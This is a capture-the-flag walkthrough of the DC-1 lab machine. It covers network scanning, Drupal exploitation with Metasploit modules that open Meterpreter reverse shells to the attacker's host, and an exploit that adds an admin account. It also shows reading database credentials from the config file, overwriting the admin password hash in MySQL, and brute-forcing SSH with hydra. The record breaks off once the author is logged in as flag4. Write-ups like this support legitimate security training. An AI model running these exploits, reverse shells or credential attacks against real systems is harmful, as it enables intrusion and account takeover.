```
root at kali in ~ $ arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:22:78:42, IPv4: 10.10.8.15
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
10.10.8.1       00:50:56:c0:00:08       VMware, Inc.
10.10.8.2       00:50:56:f2:17:ce       VMware, Inc.
10.10.8.19      00:0c:29:2b:59:d5       VMware, Inc.
10.10.8.254     00:50:56:ea:af:43       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.979 seconds (129.36 hosts/sec). 4 responded
```
netdiscover
```
root at kali in ~ $ netdiscover -r 10.10.8.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.10.8.1       00:50:56:c0:00:08      1      60  VMware, Inc.
 10.10.8.2       00:50:56:f2:17:ce      1      60  VMware, Inc.
 10.10.8.19      00:0c:29:2b:59:d5      1      60  VMware, Inc.
 10.10.8.254     00:50:56:ea:af:43      1      60  VMware, Inc.
```
```bash
#!/bin/bash
# ping.sh: ICMP sweep of 10.10.8.0/24, one echo request per host with a 1 s timeout
for ip in {1..254}
do
    ping -c 1 -W 1 10.10.8.$ip &>/dev/null
    if [ $? -eq 0 ]
    then
        echo "10.10.8.$ip is up"
    else
        echo "10.10.8.$ip is down"
    fi
done
```
```
root at kali in /tmp $ chmod +x ping.sh
root at kali in /tmp $ ./ping.sh
10.10.8.1 is up
10.10.8.2 is up
10.10.8.3 is down
......
10.10.8.14 is down
10.10.8.15 is up
10.10.8.16 is down
10.10.8.17 is down
10.10.8.18 is down
10.10.8.19 is up
10.10.8.20 is down
......
```
nmap
Nmap turns up the same target IP, 10.10.8.19:
```
root at kali in ~ $ nmap -sn -T4 --min-rate 10000 10.10.8.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-07 23:17 CST
Nmap scan report for 10.10.8.1
Host is up (0.000089s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000047s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.19
Host is up (0.000058s latency).
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000037s latency).
MAC Address: 00:50:56:EA:AF:43 (VMware)
Nmap scan report for 10.10.8.15
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.21 seconds
```
Port scan
Scan for open ports:
```
root at kali in ~ $ nmap -p- -sT -T4 --min-rate 10000 10.10.8.19
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-07 23:18 CST
Nmap scan report for 10.10.8.19
Host is up (0.00044s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
38960/tcp open  unknown
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.53 seconds
```
```
root at kali in ~ $ nmap -p22,80,111,38960 -sV -O -sT -T4 --min-rate 10000 10.10.8.19
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-07 23:19 CST
Nmap scan report for 10.10.8.19
Host is up (0.00028s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
38960/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.32 seconds
```
```
root at kali in /tmp $ nikto -url http://10.10.8.19
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.8.19
+ Target Hostname:    10.10.8.19
+ Target Port:        80
+ Start Time:         2023-11-08 00:04:29 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ /: Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Drupal 7 was identified via the x-generator header. See: https://www.drupal.org/project/remove_http_headers
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 152289, size: 1561, mtime: Thu Nov 21 04:45:59 2013. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
......
+ /robots.txt: contains 36 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /misc/favicon.ico: identifies this app/server as: Drupal 7.x. See: https://en.wikipedia.org/wiki/Favicon
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /web.config: ASP config file is accessible.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that ......
+ /user/: This might be interesting.
+ /README: Uncommon header 'tcn' found, with contents: choice.
+ /README: README file found.
......
+ 9725 requests: 0 error(s) and 42 item(s) reported on remote host
+ End Time:           2023-11-08 00:10:10 (GMT8) (341 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
```
[warning] Caching heavily affects reliability of this exploit. Nodes are used as they are discovered, but once they are done, you will have to wait for cache expiry.

Targeting http://10.10.8.19/...
[+] Finding a usable node id...
[+] Using node_id 1
[!] Target does not appear to be vulnerable.
[!] It may also simply be a caching issue, so maybe just try again later.
```
```php
if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
    echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
    echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>
```
Run it and see the result:
```
root at kali in ~/Desktop $ php 34993.php
Success! Log in with username "admin" and password "admin" at http://10.10.8.19user/login
```
```
Provided by:
  Nicky Bloor <nick@nickbloor.co.uk>
  Mehmet Ince <mehmet@mehmetince.net>

Available targets:
  Id  Name
  --  ----
  => 0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The target URI of the Drupal installation
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a Remote Command Execution vulnerability in the
  Drupal CODER Module. Unauthenticated users can execute arbitrary
  commands under the context of the web server user.

  The CODER module doesn't sufficiently validate user inputs in a script
  file that has the PHP extension. A malicious unauthenticated user can
  make requests directly to this file to execute arbitrary commands. The
  module does not need to be enabled for this to be exploited.

  This module was tested against CODER 2.5 with Drupal 7.5 installed on
  Ubuntu Server.

References:
  https://www.drupal.org/node/2765575

View the full module info with the info -d command.
```
```
Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        Dump payload command output
  PHP_FUNC     passthru         yes       PHP function to execute
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a Drupal property injection in the Forms API.

  Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
  vulnerable.
```

```
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.8.15       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)

View the full module info with the info, or info -d command.
```

```
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.8.19
RHOSTS => 10.10.8.19
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 10.10.8.15:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 10.10.8.19
[*] Meterpreter session 2 opened (10.10.8.15:4444 -> 10.10.8.19:50211) at 2023-11-08 00:19:40 +0800
```
```
Provided by:
  SektionEins
  WhiteWinterWolf
  Christian Mehlmauer <FireFart@gmail.com>
  Brandon Perry

Module stability:
  crash-safe

Available targets:
  Id  Name
  --  ----
  => 0   Drupal 7.0 - 7.31 (form-cache PHP injection method)
     1   Drupal 7.0 - 7.31 (user-post PHP injection method)

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The target URI of the Drupal installation
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits the Drupal HTTP Parameter Key/Value SQL Injection
  (aka Drupageddon) in order to achieve a remote shell on the vulnerable
  instance. This module was tested against Drupal 7.0 and 7.31 (was fixed
  in 7.32).

  Two methods are available to trigger the PHP payload on the target:

  - set TARGET 0:
  Form-cache PHP injection method (default). This uses the SQLi to upload
  a malicious form to Drupal's cache, then trigger the cache entry to
  execute the payload using a POP chain.

  - set TARGET 1:
  User-post injection method. This creates a new Drupal user, adds it to
  the administrators group, enable Drupal's PHP module, grant the
  administrators the right to bundle PHP code in their post, create a new
  post containing the payload and preview it to trigger the payload
  execution.
```

```
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.8.15       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31 (form-cache PHP injection method)

View the full module info with the info, or info -d command.
```

```
msf6 exploit(multi/http/drupal_drupageddon) > set RHOSTS 10.10.8.19
RHOSTS => 10.10.8.19
msf6 exploit(multi/http/drupal_drupageddon) > run

[*] Started reverse TCP handler on 10.10.8.15:4444
[*] Sending stage (39927 bytes) to 10.10.8.19
[*] Meterpreter session 1 opened (10.10.8.15:4444 -> 10.10.8.19:50209) at 2023-11-07 23:52:09 +0800
```
```
Provided by:
  Reginaldo Silva
  juan vazquez <juan.vazquez@metasploit.com>

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  FILEPATH   /etc/passwd      yes       The filepath to read on the server
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /drupal          yes       Base Drupal directory path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Description:
  This module abuses an XML External Entity Injection vulnerability on
  the OpenID module from Drupal. The vulnerability exists in the parsing
  of a malformed XRDS file coming from a malicious OpenID endpoint. This
  module has been tested successfully on Drupal 7.15 and 7.2 with the
  OpenID module enabled.
```

```
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/passwd      yes       The filepath to read on the server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /drupal          yes       Base Drupal directory path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host

View the full module info with the info, or info -d command.
```

```
msf6 auxiliary(gather/drupal_openid_xxe) > set RHOSTS 10.10.8.19
RHOSTS => 10.10.8.19
msf6 auxiliary(gather/drupal_openid_xxe) > run
[*] Running module against 10.10.8.19

[*] Using URL: http://10.10.8.15:8080/y7tCtsuD
[*] Server started.
[!] Unexpected answer, trying to parse anyway...
[*] Searching loot on the Drupal answer...
[*] Searching loot on HTTP query...
[*] Server stopped.
[*] Auxiliary module execution completed
```
```
Provided by:
  Devin Zuczek
  Mehmet Ince <mehmet@mehmetince.net>

Available targets:
  Id  Name
  --  ----
  => 0   Automatic

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The target URI of the Drupal installation
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a Remote PHP Code Execution vulnerability in the
  Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
  under the context of the web server user.

  RESTWS alters the default page callbacks for entities to provide
  additional functionality. A vulnerability in this approach allows an
  unauthenticated attacker to send specially crafted requests resulting
  in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to
  1.7 are affected by this issue.

  This module was tested against RESTWS 2.5 with Drupal 7.5 installed on
  Ubuntu Server.

References:
  https://www.drupal.org/node/2765567

View the full module info with the info -d command.
```
```
       Name: Drupal RESTful Web Services unserialize() RCE
     Module: exploit/unix/webapp/drupal_restws_unserialize
   Platform: PHP, Unix
       Arch: php, cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-02-20

Provided by:
  Jasper Mattsson
  Charles Fol
  Rotem Reiss
  wvu <wvu@metasploit.com>

Module side effects:
  ioc-in-logs

Module stability:
  crash-safe

Module reliability:
  unreliable-session

Available targets:
  Id  Name
  --  ----
  => 0   PHP In-Memory
     1   Unix In-Memory

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  DUMP_OUTPUT  false            no        Dump payload command output
  METHOD       POST             yes       HTTP method to use (Accepted: GET, POST, PATCH, PUT)
  NODE         1                no        Node ID to target with GET method
  Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT        80               yes       The target port (TCP)
  SSL          false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI    /                yes       Path to Drupal install
  VHOST                         no        HTTP server virtual host

Payload information:
  Avoid: 1 characters

Description:
  This module exploits a PHP unserialize() vulnerability in Drupal
  RESTful Web Services by sending a crafted request to the /node REST
  endpoint.

  As per SA-CORE-2019-003, the initial remediation was to disable POST,
  PATCH, and PUT, but Ambionics discovered that GET was also vulnerable
  (albeit cached). Cached nodes can be exploited only once.

  Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of
  this alternate vector.
```
Every good CMS needs a config file - and so do you.
This reads as a hint to go looking for the configuration file; a quick Google search:

That gives the path, so open the file:
flag2
It contains a username and password, and flag2 appears alongside them:
```php
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
'username' => 'dbuser',
'password' => 'R0ck3t',
```
Try the credentials over SSH:
```bash
ssh dbuser@10.10.8.19
ssh root@10.10.8.19
```
Neither login works.

Connecting to MySQL locally

Since neither SSH login works and the credentials are for MySQL, connect to the database locally from the web shell:
```
www-data@DC-1:/var/www$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 44
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> use drupaldb;
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
```
Generate a fresh hash with Drupal's own script. It has to be run from the Drupal root, because it includes password.inc and bootstrap.inc relative to the working directory, which is why the first attempt from inside scripts/ fails:

```
(www-data:/var/www) $ cd scripts
(www-data:/var/www/scripts) $ ./password-hash.sh 123
PHP Warning:  include_once(/var/www/scripts/includes/password.inc): failed to open stream: No such file or directory in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(): Failed opening '/var/www/scripts/includes/password.inc' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/scripts/password-hash.sh on line 83
PHP Warning:  include_once(/var/www/scripts/includes/bootstrap.inc): failed to open stream: No such file or directory in
(www-data:/var/www/scripts) $ cd ..
(www-data:/var/www) $ ./scripts/password-hash.sh 123

password: 123           hash: $S$DKZ9OkGR2kNOP34qm6lPHY.CVszApA5yWktmmZR5fi.ZnVgjHoLo
```
Write the generated hash into the admin user's row:
```sql
UPDATE users SET pass = '$S$DKZ9OkGR2kNOP34qm6lPHY.CVszApA5yWktmmZR5fi.ZnVgjHoLo' WHERE name = 'admin';
```
flag3
Try logging in with the new password:

The third flag is on the Dashboard:
```
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
```
```
www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls
ls
flag4.txt
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?
```
```
root at kali in ~ $ hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://10.10.8.19
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-09 20:17:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.8.19:22/
[22][ssh] host: 10.10.8.19   login: flag4   password: orange
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-09 20:18:12
```
The password is orange; log in with it:
```
root at kali in ~ $ ssh flag4@10.10.8.19
flag4@10.10.8.19's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ id
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
```